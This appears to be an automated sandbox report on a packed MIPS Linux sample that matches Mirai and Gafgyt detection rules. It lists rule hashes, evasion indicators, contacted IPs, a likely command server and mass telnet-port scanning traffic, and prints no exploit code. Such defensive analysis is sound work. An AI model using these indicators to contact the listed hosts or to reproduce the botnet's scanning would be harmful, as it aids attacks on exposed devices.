Source: 6258.1.00007f2584400000.00007f258441b000.r-x.sdmp, type: MEMORY	Matched rule: Mirai_Botnet_Malware date = 2016-10-04, hash5 = 420bf9215dfb04e5008c5e522eee9946599e2b323b17f17919cd802ebb012175, hash4 = 2efa09c124f277be2199bee58f49fc0ce6c64c0bef30079dfb3d94a6de492a69, hash3 = 20683ff7a5fec1237fc09224af40be029b9548c62c693844624089af568c89d4, hash2 = 05c78c3052b390435e53a87e3d31e9fb17f7c76bb4df2814313bca24735ce81c, hash1 = 05c78c3052b390435e53a87e3d31e9fb17f7c76bb4df2814313bca24735ce81c, author = Florian Roth, description = Detects Mirai Botnet Malware, hash10 = c61bf95146c68bfbbe01d7695337ed0e93ea759f59f651799f07eecdb339f83f, hash11 = d9573c3850e2ae35f371dff977fc3e5282a5e67db8e3274fd7818e8273fd5c89, hash12 = f1100c84abff05e0501e77781160d9815628e7fd2de9e53f5454dbcac7c84ca5, hash9 = bf0471b37dba7939524a30d7d5afc8fcfb8d4a7c9954343196737e72ea4e2dc4, hash8 = 89570ae59462e6472b6769545a999bde8457e47ae0d385caaa3499ab735b8147, hash7 = 70bb0ec35dd9afcfd52ec4e1d920e7045dc51dca0573cd4c753987c9d79405c0, hash6 = 62cdc8b7fffbaf5683a466f6503c03e68a15413a90f6afd5a13ba027631460c6, reference = Internal Research, license = https://creativecommons.org/licenses/by-nc/4.0/, hash13 = fb713ccf839362bf0fbe01aedd6796f4d74521b133011b408e42c1fd9ab8246b
Source: Process Memory Space: Q1BPEcSFNH.elf PID: 6249, type: MEMORYSTR	Matched rule: Linux_Trojan_Gafgyt_ea92cca8 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = aa4aee9f3d6bedd8234eaf8778895a0f5d71c42b21f2a428f01f121e85704e8e, id = ea92cca8-bba7-4a1c-9b88-a2d051ad0021, last_modified = 2021-09-16
Source: Process Memory Space: Q1BPEcSFNH.elf PID: 6252, type: MEMORYSTR	Matched rule: Linux_Trojan_Gafgyt_ea92cca8 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = aa4aee9f3d6bedd8234eaf8778895a0f5d71c42b21f2a428f01f121e85704e8e, id = ea92cca8-bba7-4a1c-9b88-a2d051ad0021, last_modified = 2021-09-16
Source: Process Memory Space: Q1BPEcSFNH.elf PID: 6258, type: MEMORYSTR	Matched rule: Linux_Trojan_Gafgyt_ea92cca8 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = aa4aee9f3d6bedd8234eaf8778895a0f5d71c42b21f2a428f01f121e85704e8e, id = ea92cca8-bba7-4a1c-9b88-a2d051ad0021, last_modified = 2021-09-16

Source: classification engine

Classification label: mal72.troj.evad.linELF@0/0@0/0

Data Obfuscation

Sample is packed with UPX

Source: initial sample	String containing UPX found: $Info: This file is packed with the UPX executable packer http://upx.sf.net $
Source: initial sample	String containing UPX found: $Info: This file is packed with the UPX executable packer http://upx.sf.net $
Source: initial sample	String containing UPX found: $Id: UPX 3.94 Copyright (C) 1996-2017 the UPX Team. All Rights Reserved. $

Hooking and other Techniques for Hiding and Protection

Uses known network protocols on non-standard ports

Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 51822
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 51830
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 51838
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 51848
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 51854
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 51864
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 51870
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 51874
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 51878
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 51882
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 51884
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 51888
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 51898
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 51910
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 51920
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 54440
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 54446
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 54456
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 54470
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 54484
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 54494
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 54506
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 54516
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 54532
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 54540
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 54552
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 54558
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 54566
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 54572
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 54582

ELF contains segments with high entropy indicating compressed/encrypted content

Source: Q1BPEcSFNH.elf

Submission file: segment LOAD with 7.9446 entropy (max. 8.0)

Uses the "uname" system call to query kernel version information (possible evasion)

Source: /tmp/Q1BPEcSFNH.elf (PID: 6249)

Queries kernel information via 'uname':

Jump to behavior

Source: Q1BPEcSFNH.elf, 6249.1.00005575530f4000.000055755319b000.rw-.sdmp, Q1BPEcSFNH.elf, 6252.1.00005575530f4000.000055755317b000.rw-.sdmp, Q1BPEcSFNH.elf, 6258.1.00005575530f4000.000055755317b000.rw-.sdmp	Binary or memory string: /etc/qemu-binfmt/mipsel
Source: Q1BPEcSFNH.elf, 6249.1.00007ffdb6545000.00007ffdb6566000.rw-.sdmp, Q1BPEcSFNH.elf, 6252.1.00007ffdb6545000.00007ffdb6566000.rw-.sdmp, Q1BPEcSFNH.elf, 6258.1.00007ffdb6545000.00007ffdb6566000.rw-.sdmp	Binary or memory string: C~ex86_64/usr/bin/qemu-mipsel/tmp/Q1BPEcSFNH.elfSUDO_USER=saturninoPATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/binDISPLAY=:1.0XAUTHORITY=/run/user/1000/gdm/XauthoritySUDO_UID=1000TERM=xterm-256colorCOLORTERM=truecolorLOGNAME=rootUSER=rootLANG=en_US.UTF-8SUDO_COMMAND=/bin/bashHOME=/rootMAIL=/var/mail/rootSUDO_GID=1000SHELL=/bin/bash/tmp/Q1BPEcSFNH.elf
Source: Q1BPEcSFNH.elf, 6249.1.00005575530f4000.000055755319b000.rw-.sdmp, Q1BPEcSFNH.elf, 6252.1.00005575530f4000.000055755317b000.rw-.sdmp, Q1BPEcSFNH.elf, 6258.1.00005575530f4000.000055755317b000.rw-.sdmp	Binary or memory string: SuU!/etc/qemu-binfmt/mipsel
Source: Q1BPEcSFNH.elf, 6249.1.00007ffdb6545000.00007ffdb6566000.rw-.sdmp, Q1BPEcSFNH.elf, 6252.1.00007ffdb6545000.00007ffdb6566000.rw-.sdmp, Q1BPEcSFNH.elf, 6258.1.00007ffdb6545000.00007ffdb6566000.rw-.sdmp	Binary or memory string: /usr/bin/qemu-mipsel

Stealing of Sensitive Information

Yara detected Mirai

Source: Yara match

File source: dump.pcap, type: PCAP

Remote Access Functionality

Yara detected Mirai

Source: Yara match

File source: dump.pcap, type: PCAP

Screenshots

Network Map

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Contacted Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
79.126.80.105	unknown	Russian Federation	12389	ROSTELECOM-ASRU	false
119.199.155.104	unknown	Korea Republic of	4766	KIXS-AS-KRKoreaTelecomKR	false
4.88.72.237	unknown	United States	3356	LEVEL3US	false
40.146.93.131	unknown	United States	4249	LILLY-ASUS	false
191.255.128.166	unknown	Brazil	27699	TELEFONICABRASILSABR	false
181.197.167.82	unknown	Panama	18809	CableOndaPA	false
129.175.213.194	unknown	France	2269	FR-U-PARISSUD-ORSAYFREU	false
170.55.11.212	unknown	United States	33132	FIBERNET-DIRECTUS	false
213.126.148.49	unknown	Netherlands	6830	LIBERTYGLOBALLibertyGlobalformerlyUPCBroadbandHolding	false
101.249.131.39	unknown	China	4134	CHINANET-BACKBONENo31Jin-rongStreetCN	false
101.128.206.189	unknown	Japan	2497	IIJInternetInitiativeJapanIncJP	false
134.233.80.61	unknown	United States	531	DNIC-AS-00531US	false
42.32.216.131	unknown	Korea Republic of	9644	SKTELECOM-NET-ASSKTelecomKR	false
178.129.66.79	unknown	Russian Federation	28812	JSCBIS-ASRU	false
109.235.167.9	unknown	Russian Federation	43247	YAMONEY-ASRU	false
99.55.160.64	unknown	United States	7018	ATT-INTERNET4US	false
47.112.7.175	unknown	China	37963	CNNIC-ALIBABA-CN-NET-APHangzhouAlibabaAdvertisingCoLtd	false
213.80.184.198	unknown	Russian Federation	15974	VTT-ASISPSaratovRussiaRU	false
194.202.212.63	unknown	United Kingdom	702	UUNETUS	false
20.237.114.37	unknown	United States	8075	MICROSOFT-CORP-MSN-AS-BLOCKUS	false
170.221.237.223	unknown	United States	8103	STATE-OF-FLAUS	false
81.116.64.110	unknown	Italy	20959	TELECOM-ITALIA-DATA-COMIT	false
109.224.113.217	unknown	Czech Republic	197197	M-NETCZ	false
62.92.203.143	unknown	Norway	2119	TELENOR-NEXTELTelenorNorgeASNO	false
12.200.128.128	unknown	United States	7018	ATT-INTERNET4US	false
181.3.99.19	unknown	Argentina	7303	TelecomArgentinaSAAR	false
75.243.102.132	unknown	United States	22394	CELLCOUS	false
193.92.123.66	unknown	Greece	1241	FORTHNET-GRForthnetEU	false
181.25.114.220	unknown	Argentina	22927	TelefonicadeArgentinaAR	false
170.68.216.174	unknown	United States	16761	FEDMOG-ASN-01US	false
109.205.225.94	unknown	United Kingdom	41951	GLOBECASTUKGB	false
91.105.101.219	unknown	Latvia	12578	APOLLO-ASLatviaLV	false
147.78.182.116	unknown	Russian Federation	208058	VTELEKOMENetworkProjectsTeamRU	false
221.37.167.191	unknown	Japan	17676	GIGAINFRASoftbankBBCorpJP	false
208.237.196.154	unknown	United States	4208	THE-ISERV-COMPANYUS	false
170.103.242.220	unknown	United States	23305	WORTHINGTONINDUSTRIESUS	false
178.87.239.141	unknown	Saudi Arabia	25019	SAUDINETSTC-ASSA	false
65.63.38.174	unknown	United States	32475	SINGLEHOP-LLCUS	false
178.75.242.108	unknown	Bulgaria	34295	ETA-BG-ASNBG	false
62.86.66.117	unknown	Italy	3269	ASN-IBSNAZIT	false
213.195.65.143	unknown	Spain	15915	IBERCOMES	false
119.147.64.62	unknown	China	4816	CHINANET-IDC-GDChinaTelecomGroupCN	false
178.121.106.224	unknown	Belarus	6697	BELPAK-ASBELPAKBY	false
181.177.244.156	unknown	Peru	27843	OPTICALTECHNOLOGIESSACPE	false
35.248.230.25	unknown	United States	3549	LVLT-3549US	false
167.58.131.83	unknown	Uruguay	6057	AdministracionNacionaldeTelecomunicacionesUY	false
181.212.43.180	unknown	Chile	16629	CTCCORPSATELEFONICAEMPRESASCL	false
218.123.202.237	unknown	Japan	17676	GIGAINFRASoftbankBBCorpJP	false
101.66.77.118	unknown	China	4837	CHINA169-BACKBONECHINAUNICOMChina169BackboneCN	false
119.252.8.129	unknown	Australia	9297	COLOCITY-AS-APColocityPtyLtdAU	false
223.93.32.108	unknown	China	56041	CMNET-ZHEJIANG-APChinaMobilecommunicationscorporationC	false
170.203.10.6	unknown	United States	17166	TRAVELERSPCASUS	false
170.255.151.49	unknown	Belgium	5400	BTGB	false
181.195.130.23	unknown	Costa Rica	11830	InstitutoCostarricensedeElectricidadyTelecomCR	false
213.24.189.63	unknown	Russian Federation	12389	ROSTELECOM-ASRU	false
170.74.23.65	unknown	United States	16761	FEDMOG-ASN-01US	false
181.97.172.57	unknown	Argentina	7303	TelecomArgentinaSAAR	false
162.237.115.189	unknown	United States	7018	ATT-INTERNET4US	false
178.212.27.76	unknown	Poland	197186	PRESTIZ-SC-POLANDPL	false
80.153.239.18	unknown	Germany	3320	DTAGInternetserviceprovideroperationsDE	false
43.155.22.68	unknown	Japan	4249	LILLY-ASUS	false
159.246.182.43	unknown	United States	29899	GEISINGERUS	false
12.200.128.105	unknown	United States	7018	ATT-INTERNET4US	false
79.30.4.248	unknown	Italy	3269	ASN-IBSNAZIT	false
116.115.226.133	unknown	China	4837	CHINA169-BACKBONECHINAUNICOMChina169BackboneCN	false
19.42.157.90	unknown	United States	3	MIT-GATEWAYSUS	false
140.168.85.29	unknown	Australia	45867	CBA-NON-AS-APCommonwealthBankofAustraliaAU	false
42.173.108.81	unknown	China	4249	LILLY-ASUS	false
116.204.165.46	unknown	Pakistan	23607	LEONET-AS-APLeoNetPvtLtdPK	false
213.110.25.86	unknown	Russian Federation	49483	SKATISPRU	false
85.108.147.23	unknown	Turkey	9121	TTNETTR	false
170.137.218.47	unknown	United States	11685	HNBCOL-ASUS	false
162.190.105.213	unknown	United States	21928	T-MOBILE-AS21928US	false
178.86.67.101	unknown	Saudi Arabia	39891	ALJAWWALSTC-ASSA	false
181.218.179.196	unknown	Brazil	21826	CorporacionTelemicCAVE	false
178.16.55.185	unknown	Germany	40999	DUSNET-ASDE	false
45.223.27.31	unknown	United States	19551	INCAPSULAUS	false
182.76.3.107	unknown	India	9498	BBIL-APBHARTIAirtelLtdIN	false
178.185.162.124	unknown	Russian Federation	12389	ROSTELECOM-ASRU	false
185.100.208.239	unknown	United Arab Emirates	200612	GULFBRIDGEINTERNATIONALQA	false
213.91.232.231	unknown	Bulgaria	8866	BTC-ASBULGARIABG	false
181.177.244.139	unknown	Peru	27843	OPTICALTECHNOLOGIESSACPE	false
181.204.131.186	unknown	Colombia	27831	ColombiaMovilCO	false
206.154.147.189	unknown	United States	3561	CENTURYLINK-LEGACY-SAVVISUS	false
5.224.39.99	unknown	Spain	12430	VODAFONE_ESES	false
59.187.104.117	unknown	Korea Republic of	3786	LGDACOMLGDACOMCorporationKR	false
62.91.213.229	unknown	Germany	20686	BISPINGISPCitycarrierGermanyDE	false
136.69.43.79	unknown	United States	60311	ONEFMCH	false
170.165.147.27	unknown	Singapore	8075	MICROSOFT-CORP-MSN-AS-BLOCKUS	false
181.197.167.25	unknown	Panama	18809	CableOndaPA	false
119.245.199.255	unknown	Japan	2514	INFOSPHERENTTPCCommunicationsIncJP	false
2.26.35.103	unknown	United Kingdom	12576	EELtdGB	false
118.131.217.158	unknown	Korea Republic of	3786	LGDACOMLGDACOMCorporationKR	false
189.177.62.189	unknown	Mexico	8151	UninetSAdeCVMX	false
152.217.102.152	unknown	United States	30313	IRSUS	false
62.32.162.199	unknown	Spain	12479	UNI2-ASES	false
118.243.92.13	unknown	Japan	4685	ASAHI-NETAsahiNetJP	false
170.115.152.158	unknown	United States	11205	CITY-OF-PHILADELPHIAUS	false
195.153.169.125	unknown	United Kingdom	1290	TELSTRAEUROPELTD-BACKBONETelstraEuropeLtdEU	false
181.91.114.249	unknown	Argentina	7303	TelecomArgentinaSAAR	false

AV Detection

Multi AV Scanner detection for submitted file

Source: Q1BPEcSFNH.elf	ReversingLabs: Detection: 21%
Source: Q1BPEcSFNH.elf	Virustotal: Detection: 22%			Perma Link

Networking

Uses known network protocols on non-standard ports

Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 51822
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 51830
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 51838
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 51848
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 51854
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 51864
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 51870
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 51874
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 51878
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 51882
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 51884
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 51888
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 51898
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 51910
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 51920
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 54440
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 54446
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 54456
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 54470
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 54484
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 54494
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 54506
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 54516
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 54532
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 54540
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 54552
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 54558
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 54566
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 54572
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 54582

Detected TCP or UDP traffic on non-standard ports

Source: global traffic	TCP traffic: 192.168.2.23:44648 -> 45.88.90.129:9902
Source: global traffic	TCP traffic: 192.168.2.23:48513 -> 105.171.252.116:2323
Source: global traffic	TCP traffic: 192.168.2.23:48513 -> 200.149.233.15:2323
Source: global traffic	TCP traffic: 192.168.2.23:48513 -> 66.139.175.161:2323
Source: global traffic	TCP traffic: 192.168.2.23:48513 -> 113.5.216.193:2323
Source: global traffic	TCP traffic: 192.168.2.23:48513 -> 188.85.163.120:2323
Source: global traffic	TCP traffic: 192.168.2.23:48513 -> 159.245.52.213:2323
Source: global traffic	TCP traffic: 192.168.2.23:48513 -> 187.131.220.7:2323
Source: global traffic	TCP traffic: 192.168.2.23:48513 -> 92.187.131.183:2323
Source: global traffic	TCP traffic: 192.168.2.23:48513 -> 175.152.130.205:2323
Source: global traffic	TCP traffic: 192.168.2.23:48513 -> 149.152.248.136:2323
Source: global traffic	TCP traffic: 192.168.2.23:48513 -> 175.254.189.182:2323
Source: global traffic	TCP traffic: 192.168.2.23:48513 -> 125.179.21.171:2323
Source: global traffic	TCP traffic: 192.168.2.23:48513 -> 91.14.175.200:2323
Source: global traffic	TCP traffic: 192.168.2.23:48513 -> 111.30.137.228:2323
Source: global traffic	TCP traffic: 192.168.2.23:48513 -> 100.142.65.52:2323
Source: global traffic	TCP traffic: 192.168.2.23:48513 -> 128.85.102.211:2323
Source: global traffic	TCP traffic: 192.168.2.23:48513 -> 79.73.38.70:2323
Source: global traffic	TCP traffic: 192.168.2.23:48513 -> 176.101.11.229:2323
Source: global traffic	TCP traffic: 192.168.2.23:48513 -> 63.142.176.205:2323
Source: global traffic	TCP traffic: 192.168.2.23:48513 -> 80.219.201.184:2323
Source: global traffic	TCP traffic: 192.168.2.23:48513 -> 13.214.26.93:2323
Source: global traffic	TCP traffic: 192.168.2.23:48513 -> 108.165.112.127:2323
Source: global traffic	TCP traffic: 192.168.2.23:48513 -> 161.201.37.157:2323
Source: global traffic	TCP traffic: 192.168.2.23:48513 -> 195.198.0.150:2323
Source: global traffic	TCP traffic: 192.168.2.23:48513 -> 47.14.88.105:2323
Source: global traffic	TCP traffic: 192.168.2.23:48513 -> 5.24.226.115:2323
Source: global traffic	TCP traffic: 192.168.2.23:48513 -> 180.255.11.47:2323
Source: global traffic	TCP traffic: 192.168.2.23:48513 -> 92.138.62.28:2323
Source: global traffic	TCP traffic: 192.168.2.23:48513 -> 216.21.208.67:2323
Source: global traffic	TCP traffic: 192.168.2.23:48513 -> 53.197.251.172:2323
Source: global traffic	TCP traffic: 192.168.2.23:48513 -> 9.155.17.80:2323
Source: global traffic	TCP traffic: 192.168.2.23:48513 -> 65.200.156.192:2323
Source: global traffic	TCP traffic: 192.168.2.23:48513 -> 186.144.132.85:2323
Source: global traffic	TCP traffic: 192.168.2.23:48513 -> 17.49.88.80:2323
Source: global traffic	TCP traffic: 192.168.2.23:48513 -> 20.95.252.175:2323
Source: global traffic	TCP traffic: 192.168.2.23:48513 -> 119.242.139.230:2323
Source: global traffic	TCP traffic: 192.168.2.23:48513 -> 89.250.96.161:2323
Source: global traffic	TCP traffic: 192.168.2.23:48513 -> 76.12.14.91:2323
Source: global traffic	TCP traffic: 192.168.2.23:48513 -> 101.42.223.69:2323
Source: global traffic	TCP traffic: 192.168.2.23:48513 -> 2.47.99.23:2323
Source: global traffic	TCP traffic: 192.168.2.23:48513 -> 105.88.179.174:2323
Source: global traffic	TCP traffic: 192.168.2.23:48513 -> 177.70.101.194:2323
Source: global traffic	TCP traffic: 192.168.2.23:48513 -> 20.95.235.87:2323
Source: global traffic	TCP traffic: 192.168.2.23:48513 -> 175.56.16.121:2323
Source: global traffic	TCP traffic: 192.168.2.23:48513 -> 71.242.238.173:2323
Source: global traffic	TCP traffic: 192.168.2.23:48513 -> 143.36.220.134:2323
Source: global traffic	TCP traffic: 192.168.2.23:48513 -> 39.190.58.254:2323
Source: global traffic	TCP traffic: 192.168.2.23:48513 -> 58.49.228.111:2323
Source: global traffic	TCP traffic: 192.168.2.23:48513 -> 119.94.214.161:2323
Source: global traffic	TCP traffic: 192.168.2.23:48513 -> 2.146.124.209:2323
Source: global traffic	TCP traffic: 192.168.2.23:48513 -> 93.149.150.14:2323
Source: global traffic	TCP traffic: 192.168.2.23:48513 -> 9.222.29.95:2323
Source: global traffic	TCP traffic: 192.168.2.23:48513 -> 67.121.32.142:2323
Source: global traffic	TCP traffic: 192.168.2.23:48513 -> 220.222.153.239:2323
Source: global traffic	TCP traffic: 192.168.2.23:48513 -> 98.153.185.137:2323
Source: global traffic	TCP traffic: 192.168.2.23:48513 -> 47.33.39.43:2323
Source: global traffic	TCP traffic: 192.168.2.23:48513 -> 105.145.228.200:2323
Source: global traffic	TCP traffic: 192.168.2.23:48513 -> 120.7.125.97:2323
Source: global traffic	TCP traffic: 192.168.2.23:48513 -> 177.133.166.8:2323
Source: global traffic	TCP traffic: 192.168.2.23:48513 -> 74.221.154.251:2323
Source: global traffic	TCP traffic: 192.168.2.23:48513 -> 35.56.238.148:2323
Source: global traffic	TCP traffic: 192.168.2.23:48513 -> 105.217.8.122:2323
Source: global traffic	TCP traffic: 192.168.2.23:48513 -> 38.11.52.162:2323
Source: global traffic	TCP traffic: 192.168.2.23:48513 -> 132.48.141.211:2323
Source: global traffic	TCP traffic: 192.168.2.23:48513 -> 40.221.236.203:2323
Source: global traffic	TCP traffic: 192.168.2.23:48513 -> 206.240.245.230:2323
Source: global traffic	TCP traffic: 192.168.2.23:48513 -> 44.39.252.1:2323
Source: global traffic	TCP traffic: 192.168.2.23:48513 -> 190.131.105.46:2323
Source: global traffic	TCP traffic: 192.168.2.23:48513 -> 150.55.83.70:2323
Source: global traffic	TCP traffic: 192.168.2.23:48513 -> 198.168.241.46:2323
Source: global traffic	TCP traffic: 192.168.2.23:48513 -> 90.114.248.174:2323
Source: global traffic	TCP traffic: 192.168.2.23:48513 -> 143.254.94.108:2323
Source: global traffic	TCP traffic: 192.168.2.23:48513 -> 176.231.243.203:2323
Source: global traffic	TCP traffic: 192.168.2.23:48513 -> 66.190.45.63:2323
Source: global traffic	TCP traffic: 192.168.2.23:48513 -> 121.38.196.220:2323
Source: global traffic	TCP traffic: 192.168.2.23:48513 -> 174.181.44.90:2323
Source: global traffic	TCP traffic: 192.168.2.23:48513 -> 58.87.134.244:2323
Source: global traffic	TCP traffic: 192.168.2.23:48513 -> 153.85.196.173:2323
Source: global traffic	TCP traffic: 192.168.2.23:48513 -> 34.100.96.187:2323
Source: global traffic	TCP traffic: 192.168.2.23:48513 -> 217.224.75.118:2323
Source: global traffic	TCP traffic: 192.168.2.23:48513 -> 87.206.3.127:2323
Source: global traffic	TCP traffic: 192.168.2.23:48513 -> 128.23.121.253:2323
Source: global traffic	TCP traffic: 192.168.2.23:48513 -> 110.214.166.134:2323
Source: global traffic	TCP traffic: 192.168.2.23:48513 -> 158.139.37.195:2323
Source: global traffic	TCP traffic: 192.168.2.23:48513 -> 44.87.34.9:2323
Source: global traffic	TCP traffic: 192.168.2.23:48513 -> 211.240.40.20:2323
Source: global traffic	TCP traffic: 192.168.2.23:48513 -> 161.29.169.98:2323
Source: global traffic	TCP traffic: 192.168.2.23:48513 -> 164.39.199.5:2323
Source: global traffic	TCP traffic: 192.168.2.23:48513 -> 101.243.123.182:2323
Source: global traffic	TCP traffic: 192.168.2.23:48513 -> 20.63.169.131:2323
Source: global traffic	TCP traffic: 192.168.2.23:48513 -> 129.21.95.98:2323
Source: global traffic	TCP traffic: 192.168.2.23:48513 -> 143.165.142.105:2323
Source: global traffic	TCP traffic: 192.168.2.23:48513 -> 128.190.128.59:2323
Source: global traffic	TCP traffic: 192.168.2.23:48513 -> 104.230.33.39:2323
Source: global traffic	TCP traffic: 192.168.2.23:48513 -> 31.144.143.94:2323
Source: global traffic	TCP traffic: 192.168.2.23:48513 -> 61.56.59.207:2323
Source: global traffic	TCP traffic: 192.168.2.23:48513 -> 103.89.248.139:2323
Source: global traffic	TCP traffic: 192.168.2.23:48513 -> 219.201.187.18:2323
Source: global traffic	TCP traffic: 192.168.2.23:48513 -> 19.18.43.234:2323
Source: global traffic	TCP traffic: 192.168.2.23:48513 -> 19.9.18.52:2323
Source: global traffic	TCP traffic: 192.168.2.23:48513 -> 194.215.220.179:2323
Source: global traffic	TCP traffic: 192.168.2.23:48513 -> 106.146.91.59:2323
Source: global traffic	TCP traffic: 192.168.2.23:48513 -> 39.70.195.151:2323
Source: global traffic	TCP traffic: 192.168.2.23:48513 -> 184.208.249.250:2323
Source: global traffic	TCP traffic: 192.168.2.23:48513 -> 32.89.200.118:2323
Source: global traffic	TCP traffic: 192.168.2.23:48513 -> 203.106.98.197:2323
Source: global traffic	TCP traffic: 192.168.2.23:48513 -> 132.120.60.18:2323
Source: global traffic	TCP traffic: 192.168.2.23:48513 -> 146.107.55.203:2323
Source: global traffic	TCP traffic: 192.168.2.23:48513 -> 105.152.36.126:2323
Source: global traffic	TCP traffic: 192.168.2.23:48513 -> 59.17.16.125:2323
Source: global traffic	TCP traffic: 192.168.2.23:48513 -> 150.224.208.245:2323
Source: global traffic	TCP traffic: 192.168.2.23:48513 -> 169.251.5.170:2323
Source: global traffic	TCP traffic: 192.168.2.23:48513 -> 185.11.18.90:2323
Source: global traffic	TCP traffic: 192.168.2.23:48513 -> 39.32.209.145:2323
Source: global traffic	TCP traffic: 192.168.2.23:48513 -> 148.119.123.225:2323
Source: global traffic	TCP traffic: 192.168.2.23:48513 -> 57.193.142.47:2323
Source: global traffic	TCP traffic: 192.168.2.23:48513 -> 181.131.249.181:2323
Source: global traffic	TCP traffic: 192.168.2.23:48513 -> 12.197.248.203:2323
Source: global traffic	TCP traffic: 192.168.2.23:48513 -> 219.127.249.35:2323
Source: global traffic	TCP traffic: 192.168.2.23:48513 -> 130.164.124.205:2323
Source: global traffic	TCP traffic: 192.168.2.23:48513 -> 171.86.225.203:2323
Source: global traffic	TCP traffic: 192.168.2.23:48513 -> 75.68.118.243:2323
Source: global traffic	TCP traffic: 192.168.2.23:48513 -> 84.152.111.236:2323
Source: global traffic	TCP traffic: 192.168.2.23:48513 -> 175.175.61.6:2323
Source: global traffic	TCP traffic: 192.168.2.23:48513 -> 68.96.169.184:2323
Source: global traffic	TCP traffic: 192.168.2.23:48513 -> 168.216.44.132:2323
Source: global traffic	TCP traffic: 192.168.2.23:48513 -> 38.81.210.135:2323
Source: global traffic	TCP traffic: 192.168.2.23:48513 -> 93.239.95.129:2323
Source: global traffic	TCP traffic: 192.168.2.23:48513 -> 116.226.140.180:2323
Source: global traffic	TCP traffic: 192.168.2.23:48513 -> 204.41.217.169:2323
Source: global traffic	TCP traffic: 192.168.2.23:48513 -> 196.253.9.75:2323
Source: global traffic	TCP traffic: 192.168.2.23:48513 -> 149.221.100.124:2323
Source: global traffic	TCP traffic: 192.168.2.23:48513 -> 199.69.245.186:2323
Source: global traffic	TCP traffic: 192.168.2.23:48513 -> 196.156.232.176:2323
Source: global traffic	TCP traffic: 192.168.2.23:48513 -> 61.101.194.127:2323
Source: global traffic	TCP traffic: 192.168.2.23:48513 -> 125.68.208.55:2323
Source: global traffic	TCP traffic: 192.168.2.23:48513 -> 85.235.26.240:2323
Source: global traffic	TCP traffic: 192.168.2.23:48513 -> 17.161.223.62:2323
Source: global traffic	TCP traffic: 192.168.2.23:48513 -> 78.231.201.62:2323
Source: global traffic	TCP traffic: 192.168.2.23:48513 -> 82.150.164.34:2323
Source: global traffic	TCP traffic: 192.168.2.23:48513 -> 53.129.22.247:2323
Source: global traffic	TCP traffic: 192.168.2.23:48513 -> 187.36.13.134:2323
Source: global traffic	TCP traffic: 192.168.2.23:48513 -> 85.76.233.222:2323
Source: global traffic	TCP traffic: 192.168.2.23:48513 -> 87.143.37.8:2323
Source: global traffic	TCP traffic: 192.168.2.23:48513 -> 128.48.172.172:2323
Source: global traffic	TCP traffic: 192.168.2.23:48513 -> 101.14.134.63:2323
Source: global traffic	TCP traffic: 192.168.2.23:48513 -> 195.160.47.16:2323
Source: global traffic	TCP traffic: 192.168.2.23:48513 -> 114.161.236.150:2323
